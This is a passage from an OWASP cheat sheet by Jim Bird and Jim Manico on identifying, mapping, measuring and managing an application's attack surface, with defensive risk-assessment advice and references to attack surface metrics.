Group each type of attack point into buckets based on risk (Internet-facing or internal-facing), purpose, implementation, design and technology. You can then count the number of attack points of each type, then choose some cases for each type, and focus your review/assessment on those cases.<br />
<br />
With this approach, you don't need to understand every endpoint in order to understand the Attack Surface and the potential risk profile of a system. Instead, you can count the different general type of endpoints and the number of points of each type. With this you can budget what it will take to assess risk at scale, and you can tell when the risk profile of an application has significantly changed.<br />
<br />
= Identifying and Mapping the Attack Surface =<br />
<br />
You can start by capturing the Attack Surface baseline in a picture and notes. Spend a few hours reviewing design and architecture documents from an attacker's perspective. Identify different points of entry/exit:<br />
* UI forms and fields<br />
* HTTP headers and cookies<br />
* APIs<br />
* Files<br />
* Databases<br />
* email or other kinds of messages<br />
* run-time arguments<br />
* ….?<br />
<br />
The number of different attack points can easily add up into the thousands or more. To make this manageable, break the model into different types based on function, design and technology:<br />
* Login/authentication entry points<br />
* Admin interfaces<br />
* Inquiries and search functions<br />
* Data entry (CRUD) forms<br />
* Business workflows<br />
* Transactional interfaces/APIs<br />
* Operational command and monitoring interfaces/APIs<br />
* ...<br />
<br />
You also need to identify the confidential and sensitive data in the application, by interviewing developers and users of the system.<br />
<br />
You can also build up a picture of the Attack Surface by scanning the application. For web apps you can use a tool like Arachni or Skipfish or w3af or one of the many commercial dynamic testing and vulnerability scanning tools or services to crawl your app and map the parts of the application that are accessible over the web. <br />
<br />
The Attack Surface model may be rough and incomplete to start, especially if you haven’t done any security work on the application before. Fill in the holes as you dig deeper in a security analysis, or as you work more with the application and make changes and realize that your understanding of the Attack Surface has changed.<br />
<br />
= Measuring and Assessing the Attack Surface =<br />
<br />
Once you have a map of the Attack Surface, identify the high risk areas. Focus on remote entry points – interfaces with outside systems and to the Internet – and especially where the system allows anonymous, public access. <br />
* Network-facing, especially internet-facing code<br />
* Web forms<br />
* Files from outside of the network<br />
* Backwards compatible interfaces with other systems – old protocols, sometimes old code and libraries, hard to maintain and test multiple versions<br />
* Custom APIs – protocols etc – likely to have mistakes in design and implementation<br />
* Security code: anything to do with crypto, authentication and session management<br />
<br />
This is where you are most exposed to attack. Then understand what compensating controls you have in place, operational controls like network firewalls and application firewalls,and intrusion detection or prevention systems to help protect your app.<br />
<br />
Michael Howard at Microsoft and other researchers have developed a method for measuring the Attack Surface of an application, and to track changes to the Attack Surface over time, called the [http://www.cs.cmu.edu/~wing/publications/Howard-Wing03.pdf Relative Attack Surface Quotient (RSQ)]. Using this method you calculate an overall attack surface score for the system, and measure this score as changes are made to the system and to how it is deployed. Researchers at Carnegie Mellon built on this work to develop a formal way to calculate an [http://www.cs.cmu.edu/~pratyus/tse10.pdf Attack Surface Metric] for large systems like SAP. They calculate the Attack Surface as the sum of all entry and exit points, channels (the different ways that clients or external systems connect to the system, including TCP/UDP ports, RPC end points, named pipes...) and untrusted data elements. Then they apply a damage potential/effort ratio to these Attack Surface elements to identify high-risk areas.<br />
<br />
= Managing the Attack Surface =<br />
<br />
Once you have a baseline understanding of the Attack Surface, you can use it to incrementally identify and manage risks going forward as you make changes to the application. Ask yourself:<br />
* What has changed? <br />
* What are you doing different? (technology, new approach, ….)<br />
* What holes could you have opened?<br />
<br />
The first web page that you create opens up the system’s Attack Surface significantly and introduces all kinds of new risks. If you add another field to that page, or another web page like it, while technically you have made the Attack Surface bigger, you haven’t increased the risk profile of the application in a meaningful way. Each of these incremental changes is more of the same, unless you follow a new design or use a new framework.<br />
<br />
If you add another web page that follows the same design and using the same technology as existing web pages, it's easy to understand how much security testing and review it needs. If you add a new web services API or file that can be uploaded from the Internet, each of these changes have a different risk profile again - see if if the change fits in an existing bucket, see if the existing controls and protections apply. If you're adding something that doesn't fall into an existing bucket, this means that you have to go through a more thorough risk assessment to understand what kind of security holes you may open and what protections you need to put in place. <br />
<br />
Changes to session management and authentication and password management directly affect the Attack Surface and need to be reviewed. So do changes to authorization and access control logic, especially adding or changing role definitions, adding admin users or admin functions with high privileges. Changes to the code that handles encryption and secrets. Fundamental changes to how data validation is done. And major architectural changes to layering and trust relationships, or fundamental changes in technical architecture – swapping out your web server or database platform, or changing the run-time OS. <br />
<br />
As you add new user types or roles or privilege levels, you do the same kind of analysis and risk assessment. Overlay the type of access across the data and functions and look for problems and inconsistencies. It's important to understand the access model for the application, whether it is positive (access is deny by default) or negative (access is allow by default). In a positive access model, any mistakes in defining what data or functions are permitted to a new user type or role are easy to see. In a negative access model,you have to be much more careful to ensure that a user does not get access to data/functions that they should not be permitted to.<br />
<br />
This kind of threat or risk assessment can be done periodically, or as a part of design work in serial / phased / spiral / waterfall development projects, or continuously and incrementally in Agile / iterative development.<br />
<br />
Normally, an application's Attack Surface will increase over time as you add more interfaces and user types and integrate with other systems. You also want to look for ways to reduce the size of the Attack Surface when you can by simplifying the model (reducing the number of user levels for example or not storing confidential data that you don't absolutely have to), turning off features and interfaces that aren't being used, by introducing operational controls such as a Web Application Firewall (WAF).<br />
<br />
= Related Articles =<br />
<br />
OWASP CLASP Identifying the Attack Surface: [[Identify attack surface]]<br />
<br><br />
OWASP Principles Minimize Attack Surface area: [[Minimize attack surface area]]<br />
<br><br />
Mitigate Security Risks by Minimizing the Code You Expose to Untrusted Users, Michael Howard http://msdn.microsoft.com/en-us/magazine/cc163882.aspx<br />
<br />
= Authors and Primary Editors =<br />
<br />
Jim Bird jimbird[at]shaw.ca<br />
<br><br />
Jim Manico - jim[at]owasp.org<br />
<br />
= Other Cheatsheets =<br />
{{Cheatsheet_Navigation}}<br />
<br />
[[Category:Cheatsheets]]</div>Jim Bird